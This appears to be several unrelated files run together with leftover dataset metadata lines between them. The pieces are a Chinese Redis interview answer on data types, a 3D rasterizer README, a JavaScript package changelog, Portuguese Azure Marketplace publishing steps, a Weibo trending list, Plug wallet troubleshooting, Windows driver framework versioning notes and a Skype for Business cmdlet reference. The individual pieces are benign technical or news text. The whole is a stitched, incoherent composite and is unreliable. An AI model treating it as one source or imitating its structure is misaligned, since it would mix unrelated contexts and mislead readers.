## 面试题 Redis 都有哪些数据类型?分别在哪些场景下使用比较合适? ## 面试官心理分析 除非是面试官感觉看你简历,是工作 3 年以内的比较初级的同学,可能对技术没有很深入的研究,面试官才会问这类问题。否则,在宝贵的面试时间里,面试官实在不想多问。 其实问这个问题,主要有两个原因: - 看看你到底有没有全面的了解 Redis 有哪些功能,一般怎么来用,啥场景用什么,就怕你别就会最简单的 KV 操作; - 看看你在实际项目里都怎么玩儿过 Redis。 要是你回答的不好,没说出几种数据类型,也没说什么场景,你完了,面试官对你印象肯定不好,觉得你平时就是做个简单的 set 和 get。 ## 面试题剖析 Redis 主要有以下几种数据类型: - Strings - Hashes - Lists - Sets - Sorted Sets > Redis 除了这 5 种数据类型之外,还有 Bitmaps、HyperLogLogs、Streams 等。 ### Strings 这是最简单的类型,就是普通的 set 和 get,做简单的 KV 缓存。 ```bash set college szu ``` ### Hashes 这个是类似 map 的一种结构,这个一般就是可以将结构化的数据,比如一个对象(前提是**这个对象没嵌套其他的对象**)给缓存在 Redis 里,然后每次读写缓存的时候,可以就操作 hash 里的**某个字段**。 ```bash hset person name bingo hset person age 20 hset person id 1 hget person name ``` ```json (person = { "name": "bingo", "age": 20, "id": 1 }) ``` ### Lists Lists 是有序列表,这个可以玩儿出很多花样。 比如可以通过 list 存储一些列表型的数据结构,类似粉丝列表、文章的评论列表之类的东西。 比如可以通过 lrange 命令,读取某个闭区间内的元素,可以基于 list 实现分页查询,这个是很棒的一个功能,基于 Redis 实现简单的高性能分页,可以做类似微博那种下拉不断分页的东西,性能高,就一页一页走。 ```bash # 0开始位置,-1结束位置,结束位置为-1时,表示列表的最后一个位置,即查看所有。 lrange mylist 0 -1 ``` 比如可以搞个简单的消息队列,从 list 头怼进去,从 list 尾巴那里弄出来。 ```bash lpush mylist 1 lpush mylist 2 lpush mylist 3 4 5 # 1 rpop mylist ``` ### Sets Sets 是无序集合,自动去重。 直接基于 set 将系统里需要去重的数据扔进去,自动就给去重了,如果你需要对一些数据进行快速的全局去重,你当然也可以基于 jvm 内存里的 HashSet 进行去重,但是如果你的某个系统部署在多台机器上呢?得基于 Redis 进行全局的 set 去重。 可以基于 set 玩儿交集、并集、差集的操作,比如交集吧,可以把两个人的粉丝列表整一个交集,看看俩人的共同好友是谁?对吧。 把两个大 V 的粉丝都放在两个 set 中,对两个 set 做交集。 ```bash #-------操作一个set------- # 添加元素 sadd mySet 1 # 查看全部元素 smembers mySet # 判断是否包含某个值 sismember mySet 3 # 删除某个/些元素 srem mySet 1 srem mySet 2 4 # 查看元素个数 scard mySet # 随机删除一个元素 spop mySet #-------操作多个set------- # 将一个set的元素移动到另外一个set smove yourSet mySet 2 # 求两set的交集 sinter yourSet mySet # 求两set的并集 sunion yourSet mySet # 求在yourSet中而不在mySet中的元素 sdiff yourSet mySet ``` ### Sorted Sets Sorted Sets 是排序的 set,去重但可以排序,写进去的时候给一个分数,自动根据分数排序。 ```bash zadd board 85 zhangsan zadd board 72 lisi zadd board 96 wangwu zadd board 63 zhaoliu # 获取排名前三的用户(默认是升序,所以需要 rev 改为降序) zrevrange board 0 3 # 获取某用户的排名 zrank board zhaoliu ```
14.821429
126
0.741205
yue_Hant
0.775733
bb3126835287334e1d43030bb5ada98327eb4aa0
293
md
Markdown
README.md
GuildMasterInfinite/3D-Software-Rasterizer
cebb8126fd7761faf17718d5ed0675342d6017fb
[ "MIT" ]
null
null
null
README.md
GuildMasterInfinite/3D-Software-Rasterizer
cebb8126fd7761faf17718d5ed0675342d6017fb
[ "MIT" ]
null
null
null
README.md
GuildMasterInfinite/3D-Software-Rasterizer
cebb8126fd7761faf17718d5ed0675342d6017fb
[ "MIT" ]
null
null
null
# 3D Software Rasterizer #### In TypeScript Software renderer that uses the CPU to draw 3D meshes. Adapted from [How to write a 3D soft engine from scratch](https://www.davrous.com/2013/06/13/tutorial-series-learning-how-to-write-a-3d-soft-engine-from-scratch-in-c-typescript-or-javascript/)
48.833333
192
0.778157
eng_Latn
0.852733
bb312966b2ce19d7f1665340c4b4b1c5137527e3
2,008
md
Markdown
packages/rstream-dot/CHANGELOG.md
chancyk/umbrella
f24e2605b493db10a1e760ad7a358bf0ef55d437
[ "Apache-2.0" ]
null
null
null
packages/rstream-dot/CHANGELOG.md
chancyk/umbrella
f24e2605b493db10a1e760ad7a358bf0ef55d437
[ "Apache-2.0" ]
null
null
null
packages/rstream-dot/CHANGELOG.md
chancyk/umbrella
f24e2605b493db10a1e760ad7a358bf0ef55d437
[ "Apache-2.0" ]
null
null
null
# Change Log All notable changes to this project will be documented in this file. See [Conventional Commits](https://conventionalcommits.org) for commit guidelines. ## [1.1.53](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected][email protected]/[email protected]) (2020-12-22) **Note:** Version bump only for package @thi.ng/rstream-dot # [1.1.0](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected][email protected]/[email protected]) (2019-07-07) ### Features * **rstream-dot:** enable TS strict compiler flags (refactor) ([acfe75e](https://github.com/thi-ng/umbrella/commit/acfe75e)) # [1.0.0](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected][email protected]/[email protected]) (2019-01-21) ### Build System * update package scripts, outputs, imports in remaining packages ([f912a84](https://github.com/thi-ng/umbrella/commit/f912a84)) ### BREAKING CHANGES * enable multi-outputs (ES6 modules, CJS, UMD) - build scripts now first build ES6 modules in package root, then call `scripts/bundle-module` to build minified CJS & UMD bundles in `/lib` - all imports MUST be updated to only refer to package level (not individual files anymore). tree shaking in user land will get rid of all unused imported symbols <a name="0.2.0"></a> # [0.2.0](https://github.com/thi-ng/umbrella/compare/@thi.ng/[email protected][email protected]/[email protected]) (2018-04-26) ### Features * **rstream-dot:** add option to include stream values in diag ([d057d95](https://github.com/thi-ng/umbrella/commit/d057d95)) <a name="0.1.0"></a> # 0.1.0 (2018-04-24) ### Features * **rstream-dot:** add xform edge labels, extract types to api.ts ([7ffaa61](https://github.com/thi-ng/umbrella/commit/7ffaa61)) * **rstream-dot:** initial import [@thi](https://github.com/thi).ng/rstream-dot package ([e72478a](https://github.com/thi-ng/umbrella/commit/e72478a)) * **rstream-dot:** support multiple roots in walk() ([704025a](https://github.com/thi-ng/umbrella/commit/704025a))
39.372549
150
0.711155
eng_Latn
0.299418
bb323eb0bbb1f37a0ce0bff032f438e027ce7afa
6,538
md
Markdown
articles/machine-learning/machine-learning-publish-web-service-to-azure-marketplace.md
OpenLocalizationTestOrg/azure-docs-pr15_pt-PT
5e59afe967060983f82bc619bdb5452d16985452
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/machine-learning-publish-web-service-to-azure-marketplace.md
OpenLocalizationTestOrg/azure-docs-pr15_pt-PT
5e59afe967060983f82bc619bdb5452d16985452
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
articles/machine-learning/machine-learning-publish-web-service-to-azure-marketplace.md
OpenLocalizationTestOrg/azure-docs-pr15_pt-PT
5e59afe967060983f82bc619bdb5452d16985452
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
<properties pageTitle="Publicar a aprendizagem máquina serviço ao Azure Marketplace web | Microsoft Azure" description="Como publicar o seu serviço de Web de aprendizagem do Azure máquina ao Azure Marketplace" services="machine-learning" documentationCenter="" authors="BharathS" manager="jhubbard" editor="cgronlun"/> <tags ms.service="machine-learning" ms.workload="data-services" ms.tgt_pltfrm="na" ms.devlang="na" ms.topic="article" ms.date="09/08/2016" ms.author="bharaths"/> # <a name="publish-azure-machine-learning-web-service-to-the-azure-marketplace"></a>Publicar o serviço de Web de aprendizagem máquina Azure no Azure Marketplace Azure Marketplace fornece a capacidade de gratuito serviços para consumo por clientes externos ou publicar serviços web de aprendizagem do Azure máquina como paga. Este artigo fornece uma descrição geral do processo com ligações para as diretrizes para começar a utilizar. Ao utilizar este processo, pode tornar os serviços web disponível para outros programadores consumir nas suas aplicações. [AZURE.INCLUDE [machine-learning-free-trial](../../includes/machine-learning-free-trial.md)] ## <a name="overview-of-the-publishing-process"></a>Descrição geral do processo de publicação Seguem-se os passos para publicar um serviço web de aprendizagem do Azure máquina Azure Marketplace: 1. Criar e publicar um serviço de formação de máquina pedido-resposta (RRS) 2. Implementar o serviço de produção e obter as informações de ponto final de chave de API e OData. 3. Utilizar o URL do serviço web publicada para publicar o [Azure Marketplace (Data Market)](https://publish.windowsazure.com/workspace/) 4. Depois de submetido, a sua oferta for revista e precisa de ser aprovadas antes dos seus clientes pode começar a compra-lo. O processo de publicação pode demorar alguns dias de empresas. ## <a name="walk-through"></a>Percorrer ###<a name="step-1-create-and-publish-a-machine-learning-request-response-service-rrs"></a>Passo 1: Criar e publicar um serviço de formação de máquina pedido-resposta (RRS)### Caso ainda não o tenha este já, consulte veja este [ajudasse](machine-learning-walkthrough-5-publish-web-service.md). ###<a name="step-2-deploy-the-service-to-production-and-obtain-the-api-key-and-odata-endpoint-information"></a>Passo 2: Implementar o serviço de produção e obter a chave de API e informações de ponto final de OData### 1. A partir do [Portal clássica Azure](http://manage.windowsazure.com), selecione a opção de **Aprendizagem automática** a partir da barra de navegação do lado esquerdo e, selecione a área de trabalho. 2. Clique no separador **Serviços WEB** e, selecione o serviço web que pretende publicar no mercado. ![Azure Marketplace][workspace] 3. Selecione o ponto final que pretende ter marketplace consumir. Se não tiver criado qualquer os pontos finais adicionais, pode selecionar o ponto final **predefinido** . 4. Depois de ter clicado no ponto final, vai conseguir ver a **Chave de API**. Terá este bloco de informações posterior no passo 3, por isso, fazer uma cópia do mesmo. ![Azure Marketplace][apikey] 5. Clique no método **Pedido/resposta** , neste momento, que não suportamos publicação lote execução serviços mercado. Que será direcionado para a página de ajuda API para o método de pedido/resposta. 6. Copie o **Endereço de ponto final de OData**, terá destas informações mais tarde no passo 3. ![Azure Marketplace][odata] Implemente o serviço de produção. ###<a name="step-3-use-the-url-of-the-published-web-service-to-publish-to-azure-marketplace-datamarket"></a>Passo 3: Utilizar o URL do serviço web publicada para publicar o Azure Marketplace (DataMarket)### 1. Navegue até ao [Azure Marketplace (Data Market)](http://datamarket.azure.com/home) 2. Clique na ligação **Publicar** na parte superior da página. Esta será direcionado para o [Portal de publicação do Microsoft Azure](https://publish.windowsazure.com) 3. Clique na secção **fabricantes** para registar como um fabricante. 4. Ao criar uma nova oferta, selecione os **Serviços de dados**, em seguida, clique em **criar um novo serviço de dados**. ![Azure Marketplace][image1] <br /> 5. Em **planos** fornecem informações sobre a sua oferta, incluindo um plano de preços. Decida se irá oferecer um serviço gratuito ou pago. Para obter pagas, fornece informações de pagamento, como as informações de identificação bancária e impostos. 6. Em **Marketing** fornecem informações sobre a sua oferta, tal como o título e descrição para a sua oferta. 7. Em **preços** pode configurar o preço para os planos para países/regiões específicos, ou deixar que o sistema "autoprice" a sua oferta. 8. No separador do **Serviço de dados** , clique em **Serviço Web** como a **Origem de dados**. ![Azure Marketplace][image2] 9. Obtenha o URL e API chave do serviço web do Portal clássica do Azure, tal como é explicado no passo 2 acima. 10. Na caixa de diálogo Configurar serviço de dados Marketplace, cole o endereço de ponto final de OData a caixa de texto do **URL do serviço** . 11. Para **autenticação**, selecione **cabeçalho** como o **Esquema de autenticação**. - Introduza "Autorização" para o **nome de cabeçalho**. - Para o **Valor de cabeçalho**, introduza "Portadores" (sem as aspas), clique na barra de **espaço** e, em seguida, cole a chave de API. - Selecione a caixa de verificação **este serviço está OData** . - Clique em **Testar ligação** para testar a ligação. 12. Em **categorias**, certifique-se de **Que aprendizagem automática** está selecionada. 13. Quando terminar introduzir todos os metadados sobre a sua oferta, clique em **Publicar**e, em seguida, **notificações Push para transição**. Neste momento, será notificado de que precisa de corrigir problemas restantes. 14. Depois de ter assegurado conclusão de todos os problemas pendentes, clique em **Pedir aprovação para transmitir para produção**. O processo de publicação pode demorar alguns dias de empresas. [image1]:./media/machine-learning-publish-web-service-to-azure-marketplace/image1.png [image2]:./media/machine-learning-publish-web-service-to-azure-marketplace/image2.png [workspace]:./media/machine-learning-publish-web-service-to-azure-marketplace/selectworkspace.png [apikey]:./media/machine-learning-publish-web-service-to-azure-marketplace/apikey.png [odata]:./media/machine-learning-publish-web-service-to-azure-marketplace/odata.png
58.900901
394
0.759254
por_Latn
0.998557
bb33d6c88bd465794d69f33413aff46b90f5a11d
1,423
md
Markdown
2020/08/11/2020-08-11 08:15.md
zhzhzhy/WeiBoHot_history
32ce4800e63f26384abb17d43e308452c537c902
[ "MIT" ]
3
2020-07-14T14:54:15.000Z
2020-08-21T06:48:24.000Z
2020/08/11/2020-08-11 08:15.md
zhzhzhy/WeiBoHot_history
32ce4800e63f26384abb17d43e308452c537c902
[ "MIT" ]
null
null
null
2020/08/11/2020-08-11 08:15.md
zhzhzhy/WeiBoHot_history
32ce4800e63f26384abb17d43e308452c537c902
[ "MIT" ]
null
null
null
2020年08月11日08时数据 Status: 200 1.戚薇吐槽工作室P图 微博热度:3077776 2.北京野生动物园游客强行拿走天鹅蛋 微博热度:2821038 3.肌因决定一切吗 微博热度:2751958 4.上海东方明珠塔被闪电击中 微博热度:2648337 5.世卫组织称零号病人不一定来自武汉 微博热度:1540845 6.李尖尖可爱 微博热度:1187597 7.台风 微博热度:1070536 8.许昕孙颖莎夺得混双冠军 微博热度:1002298 9.白宫附近发生枪击 微博热度:805023 10.袁咏琳遇车祸 微博热度:687771 11.杨超越演技 微博热度:595799 12.王大陆母亲去世 微博热度:554676 13.以家人之名 微博热度:477018 14.暴雨中男子用漏勺帮捞苹果 微博热度:435826 15.公安妇联介入男子疑锁妻多年事件 微博热度:354391 16.沃尔玛连续七年成为全球最大公司 微博热度:349954 17.路人镜头下的明星 微博热度:343984 18.芝加哥发生骚乱100多人被捕 微博热度:339281 19.鲁能集团由中国绿发接手 微博热度:328431 20.肖战 微博热度:325945 21.综艺里笑点十足的翻车现场 微博热度:319129 22.假如和五年后的自己对话 微博热度:313294 23.见过化妆最厉害的人 微博热度:307037 24.黎巴嫩政府内阁辞职 微博热度:288709 25.鞠婧祎采访的笑点 微博热度:286328 26.李荣浩用无价之姐唱懵李宇春 微博热度:284458 27.小区规定晚十点半前不能遛狗 微博热度:279317 28.朋友圈骂人被判朋友圈道歉10天 微博热度:259285 29.iOS14 beta4 微博热度:249627 30.景区回应老人乞讨儿子开车接送 微博热度:245985 31.贾玲言承旭版我好喜欢你海报 微博热度:243809 32.班主任病逝百万遗产捐学校 微博热度:190822 33.网播平台回应男子手机撞号陈屿 微博热度:184687 34.央视曝光奔驰4S店偷换三无配件 微博热度:166179 35.路小北吃醋 微博热度:163548 36.英仙座流星雨 微博热度:159022 37.王俊凯和Mlxg打游戏 微博热度:155922 38.沙宝亮经纪公司声明 微博热度:155408 39.贺子秋被抛弃 微博热度:152865 40.把男朋友叫做普通朋友 微博热度:152491 41.美国巴尔的摩发生爆炸 微博热度:147663 42.成都暴雨 微博热度:141673 43.厦门台风 微博热度:140932 44.广东1100多岁古榕树倒塌 微博热度:140387 45.且听凤鸣 微博热度:140341 46.德国大叔的无声面包店 微博热度:137205 47.深航挂7700航班乘客发声 微博热度:137040 48.2020年财富世界500强 微博热度:136941 49.贵州兴义公交失控致多人受伤 微博热度:136926 50.港独分子周庭被捕 微博热度:135929
6.97549
18
0.784961
yue_Hant
0.297174
bb3440cf7bf5a5fef2fbcb5fc94aff9728a5789c
4,861
md
Markdown
docs/resources/troubleshooting-tokens.md
Psychedelic/plug-docs
034615d31be6b43ba1af54b8e1659a7b19c2a29f
[ "MIT" ]
4
2021-07-09T14:42:18.000Z
2022-03-31T11:59:21.000Z
docs/resources/troubleshooting-tokens.md
Psychedelic/plug-docs
034615d31be6b43ba1af54b8e1659a7b19c2a29f
[ "MIT" ]
null
null
null
docs/resources/troubleshooting-tokens.md
Psychedelic/plug-docs
034615d31be6b43ba1af54b8e1659a7b19c2a29f
[ "MIT" ]
2
2021-08-17T15:35:46.000Z
2022-03-26T18:48:08.000Z
--- date: "1" --- # Troubleshooting - Tokens ![](imgs/trob-tok.png) If you’re having trouble with Plug, this guide is meant to address common errors related to tokens in your wallet. Please work through this guide before reaching out to support, the first thing our support team will send you is this troubleshooting guide. If you still have issues after trying these steps, contact us. **For issues with other topics, see:** 1. [Troubleshooting Issues with NFTs.](https://docs.plugwallet.ooo/resources/troubleshooting-nfts/) 2. [Troubleshooting General Issues.](https://docs.plugwallet.ooo/resources/troubleshooting-general/) --- ## My ICP is not showing but I can see the transaction on activity? To begin troubleshooting, we’ll need to figure out what the error message is by checking background controller logs. To do this, we’ll access the Plug extension **Background Console**. ### How to access Plug’s Background Console Press the “Extensions” button in the top right corner of your browser. Click “Manage Extensions” Enable “Developer Mode” in the top right corner of the “Manage Extensions” page. Finally, open the console by clicking “background page” next to “Inspect Views” on the Plug extension modal. ![How to get to Background Console](https://storageapi.fleek.co/fleek-team-bucket/TroubleshootingPlugResources/PlugBackgroundConsoleGIF.gif) You have successfully opened Plug’s Background Console, **please take note of the error** and continue with the troubleshooting guide below. ### “Clock Error” - Code 400: Specified ingress_expiry not within expected range The NNS ledger is very strict about requests to the ledger and when they expire. There’s a known error - if your clock on your Windows/MacOS/Mobile device is not set to time zone updating “automatically” and is out of sync, the NNS ledger will reject your query to check your assets. **To solve the “Clock Error” in Plug, follow the troubleshooting steps below:** 1. On your Windows/MacOS device, visit your device time/date settings. 2. Make sure that the time zone and time is set to “automatically”. 3. That’s it! Restart your browser, and Plug should show all your assets. In some cases, turning it "off" and then back "on" (both settings) to automatic, can help resolve the issue and ensure the time is refreshed. If your issue persists please reach out to us in the #support channel of our Discord with a short explanation of the error, your browser version, and your OS version so we can begin the troubleshooting process and help you resolve the issue. You may find the link to our Discord [here](https://discord.gg/fleekhq). --- ### Canister Down Error: The Asset's Canister is Unavailable If you are receiving the “Canister Down” error while for example visiting the Assets tab and not seeing your balances it might be due to the Token's or projects canister being down. There’s nothing that can be done directly from Plug to troubleshoot this issue, please contact the team who developed the token that isn’t loading for more information and wait for them to bring it back online. --- ### Subnet Down Error: The Subnet where the Asset Lives is Down If nothing is loading or showing, you may receive the “Subnet Down” error message, this means that the Internet Computer is currently having some trouble processing requests to the subnet due to a variety of factors such as high traffic, performance upgrades, user throttling, etc. There’s nothing Plug can do to resolve this issue, please wait until the subnet is brought back online & stay up-to-date with Internet Computer. You may learn about the status of the Internet Computer here: https://status.internetcomputer.org/ --- ## Where can I get ICP and how do I transfer ICP to Plug? You can purchase ICP on Binance, Coinbase, or any other exchange that has ICP listed. You transfer ICP by going to your exchange withdrawal page, selecting ICP, and withdrawing it to your Plug’s Account ID. You may find your Account ID by following the steps below: 1. On your Plug home page, click on “Deposit” 2. Click “Continue” with ICP as the selected asset. 3. Copy the “Account ID”. 4. Paste that ID in the withdrawal field of the exchange. *Note: Most exchanges use Account ID instead of Principal ID to transfer ICP, to learn more about the difference between Account ID and Principal ID visit our [Internet Identities 101 article](https://medium.com/plugwallet/internet-computer-ids-101-669b192a2ace).*. --- ## My issue still persists or is not covered here! If your issue persists please reach out to us in the #support channel of our Discord with a short explanation of the error, your browser version, and your OS version so we can begin the troubleshooting process and help you resolve the issue. You may find the link to our Discord [here](https://discord.gg/fleekhq).
53.417582
283
0.775149
eng_Latn
0.997692
bb346e53151e8f33a3b499ef6025f7d1898679e3
3,021
md
Markdown
windows-driver-docs-pr/wdf/framework-library-versioning.md
AndrewGaspar/windows-driver-docs
10fd59af49d010138c1b62aeeab6bc37249c4566
[ "CC-BY-3.0" ]
4
2018-03-20T00:56:26.000Z
2021-06-07T15:58:40.000Z
windows-driver-docs-pr/wdf/framework-library-versioning.md
AndrewGaspar/windows-driver-docs
10fd59af49d010138c1b62aeeab6bc37249c4566
[ "CC-BY-3.0" ]
null
null
null
windows-driver-docs-pr/wdf/framework-library-versioning.md
AndrewGaspar/windows-driver-docs
10fd59af49d010138c1b62aeeab6bc37249c4566
[ "CC-BY-3.0" ]
3
2021-02-04T21:15:08.000Z
2021-02-04T21:15:09.000Z
--- title: Framework Library Versioning author: windows-driver-content description: In this topic, you'll learn about the naming conventions for the file names of the Kernel-Mode Driver Framework (KMDF) library and the User-Mode Driver Framework (UMDF) library. ms.assetid: 51db6f3c-45cb-46a7-9dd4-2bab67893fea keywords: ["kernel-mode drivers WDK KMDF , library versions", "KMDF WDK , library versions", "Kernel-Mode Driver Framework WDK , library versions", "library WDK KMDF", "version numbers WDK KMDF", "major version numbers WDK KMDF", "minor version numbers WDK KMDF"] --- # Framework Library Versioning In this topic, you'll learn about the naming conventions for the file names of the Kernel-Mode Driver Framework (KMDF) library and the User-Mode Driver Framework (UMDF) library. ## KMDF A major version number and a minor version number are assigned to each version of the KMDF library. The library's file name contains the major version number. The file name's format is: **Wdf**&lt;*MajorVersionNumber*&gt;**000.sys** The major version number uses two characters. For example, the file name for version 1.0 of the library is *Wdf01000.sys*. Versions 1.9, 1.11, and so on are also named *Wdf01000.sys*, and each new minor version of the library file overwrites the previous version of the file. If you built your driver using a version of the KMDF library that is more recent than the version of the framework that is on the system, then the latter must be updated. For information about updating the framework library, see [Redistributable Framework Components](installation-components-for-kmdf-drivers.md). (Note that the framework co-installer's file name includes both the major and minor version numbers. For more information about co-installer file names, see [Using the KMDF Co-installer](installing-the-framework-s-co-installer.md).) When you build your driver, the MSBuild utility links the driver with a stub file that contains the version number of the library that the MSBuild utility used. When the operating system loads your driver, the framework's loader checks the version information in your driver's stub to determine if the driver will run with the version of the framework library that is on the system. To determine the version of the library that your driver is running with, the driver can call [**WdfDriverIsVersionAvailable**](https://msdn.microsoft.com/library/windows/hardware/ff547190) or [**WdfDriverRetrieveVersionString**](https://msdn.microsoft.com/library/windows/hardware/ff547211). For information about the release history of the KMDF library, see [KMDF Version History](kmdf-version-history.md). ## UMDF As with KMDF, the major version number of the UMDF library uses two characters. However, the major version number only appears in the UMDF library file name starting with UMDF version 2.0. For UMDF version 2.0, the file name of the UMDF library is *Wudfx02000.dll*. For UMDF version 1.*x*, the file name of the UMDF library is *Wudfx.dll*.    
60.42
382
0.784177
eng_Latn
0.982003
bb3480f0910c3649be0560a1db69482cf88de7e5
9,215
md
Markdown
skype/skype-ps/skype/Set-CsNetworkInterRegionRoute.md
dkkazak/office-docs-powershell
454b7de11e695c5d0e69d88cdd5278262053333a
[ "CC-BY-4.0", "MIT" ]
1
2019-07-14T18:19:59.000Z
2019-07-14T18:19:59.000Z
skype/skype-ps/skype/Set-CsNetworkInterRegionRoute.md
dkkazak/office-docs-powershell
454b7de11e695c5d0e69d88cdd5278262053333a
[ "CC-BY-4.0", "MIT" ]
null
null
null
skype/skype-ps/skype/Set-CsNetworkInterRegionRoute.md
dkkazak/office-docs-powershell
454b7de11e695c5d0e69d88cdd5278262053333a
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- external help file: Microsoft.Rtc.Management.dll-help.xml applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 title: Set-CsNetworkInterRegionRoute schema: 2.0.0 author: kenwith ms.author: kenwith ms.reviewer: --- # Set-CsNetworkInterRegionRoute ## SYNOPSIS Modifies an existing route that connects network regions within a call admission control (CAC) configuration. This cmdlet was introduced in Lync Server 2010. ## SYNTAX ### Identity ``` Set-CsNetworkInterRegionRoute [[-Identity] <XdsGlobalRelativeIdentity>] [-NetworkRegionID1 <String>] [-NetworkRegionID2 <String>] [-NetworkRegionLinkIDs <String>] [-NetworkRegionLinks <PSListModifier>] [-Force] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ### Instance ``` Set-CsNetworkInterRegionRoute [-Instance <PSObject>] [-NetworkRegionID1 <String>] [-NetworkRegionID2 <String>] [-NetworkRegionLinkIDs <String>] [-NetworkRegionLinks <PSListModifier>] [-Force] [-WhatIf] [-Confirm] [<CommonParameters>] ``` ## DESCRIPTION Every region within a CAC configuration must have some way to access every other region. While region links set bandwidth limitations on the connections between regions and also represent the physical links, a route determines which linked path the connection will traverse from one region to another. This cmdlet modifies that route association. ## EXAMPLES ### -------------------------- Example 1 -------------------------- ``` Set-CsNetworkInterRegionRoute -Identity NA_APAC_Route -NetworkRegionLinkIDs "NA_SA,SA_APAC" ``` This example modifies the route NA_APAC_Route by changing the region links that will be traversed along the route. The NetworkRegionLinkIDs parameter is used with a value of "NA_SA,SA_APAC", which replaces any existing links with the two specified in that string. ### -------------------------- Example 2 -------------------------- ``` Set-CsNetworkInterRegionRoute -Identity NA_APAC_Route -NetworkRegionLinks @{add="SA_EMEA"} ``` Like Example 1, Example 2 modifies the links within the NA_APAC_Route route. However, in this example, instead of replacing all links for that route by using the NetworkRegionLinkIDs parameter, the NetworkRegionLinks parameter is used to add a link to the list of links that already exists on that route. In this case, the link SA_EMEA is added to the route. The syntax @{add=\<link\>} adds an element to the list of links. You can also use the syntax @{replace=\<link\>} to replace all existing links with those specified by \<link\> (which essentially behaves the same as using NetworkRegionLinkIDs), or the syntax @{remove=\<link\>} to remove a link from the list. ### -------------------------- Example 3 -------------------------- ``` Set-CsNetworkInterRegionRoute -Identity NA_Route5 -NetworkRegionID2 SouthAmerica -NetworkRegionLinkIDs "NA_SA,SA_APAC" ``` Example 3 modifies the route named NA_Route5. This example changes one of the regions that comprise this route. The NetworkRegionID2 parameter is used to specify the new region and then the NetworkRegionLinkIDs parameter is used to create a new list of links to connect the regions of this route. ## PARAMETERS ### -Identity The unique identifier for the network region route you want to modify. Network region routes are created only at the global scope, so this identifier does not need to specify a scope. Instead, it contains a string that is a unique name that identifies that route. ```yaml Type: XdsGlobalRelativeIdentity Parameter Sets: Identity Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: 2 Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Instance An object reference to an existing region route. This object must be of type Microsoft.Rtc.Management.WritableConfig.Settings.NetworkConfiguration.InterNetworkRegionRouteType, which can be retrieved by calling the `Get-CsNetworkInterRegionRoute` cmdlet. ```yaml Type: PSObject Parameter Sets: Instance Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: True (ByValue) Accept wildcard characters: False ``` ### -NetworkRegionID1 The Identity (NetworkRegionID) of one of the two regions connected through this route. The value passed to this parameter must be a different region from the value of the NetworkRegionID2 parameter. (In other words, you can't route a region to itself.) In addition, the combination of NetworkRegionID1 and NetworkRegionID2 must be unique (for example, you can't have two routes defined that connect NorthAmerica and EMEA). ```yaml Type: String Parameter Sets: (All) Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -NetworkRegionID2 The Identity (NetworkRegionID) of one of the two regions connected through this route. The value passed to this parameter must be a different region from the value of the NetworkRegionID1 parameter. (In other words, you can't route a region to itself.) In addition, the combination of NetworkRegionID1 and NetworkRegionID2 must be unique (for example, you can't have two routes defined that connect NorthAmerica and EMEA). ```yaml Type: String Parameter Sets: (All) Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -NetworkRegionLinkIDs Allows you to specify all the links for this route as a string of comma-separated values. The values are the identities (NetworkRegionLinkIDs) of the region links. If you enter values for both NetworkRegionLinkIDs and NetworkRegionLinks, NetworkRegionLinkIDs will be ignored. Any links modified using this parameter will replace all existing links in the route. ```yaml Type: String Parameter Sets: (All) Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -NetworkRegionLinks A list object containing the identities (NetworkRegionLinkIDs) of the region links that apply to this route. For this cmdlet, this parameter differs from the NetworkRegionLinkIDs in that in addition to allowing you to replace all existing links for this route, you can also add or remove individual links. ```yaml Type: PSListModifier Parameter Sets: (All) Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Force Suppresses any confirmation prompts that would otherwise be displayed before making changes. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -WhatIf Describes what would happen if you executed the command without actually executing the command. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: wi Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -Confirm Prompts you for confirmation before executing the command. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: cf Applicable: Lync Server 2010, Lync Server 2013, Skype for Business Server 2015, Skype for Business Server 2019 Required: False Position: Named Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (https://go.microsoft.com/fwlink/?LinkID=113216). ## INPUTS ### Microsoft.Rtc.Management.WritableConfig.Settings.NetworkConfiguration.InterNetworkRegionRouteType object. Accepts pipelined input of network interregion route objects. ## OUTPUTS ### This cmdlet does not return a value. It modifies an object of type Microsoft.Rtc.Management.WritableConfig.Settings.NetworkConfiguration.InterNetworkRegionRouteType. ## NOTES ## RELATED LINKS [New-CsNetworkInterRegionRoute](New-CsNetworkInterRegionRoute.md) 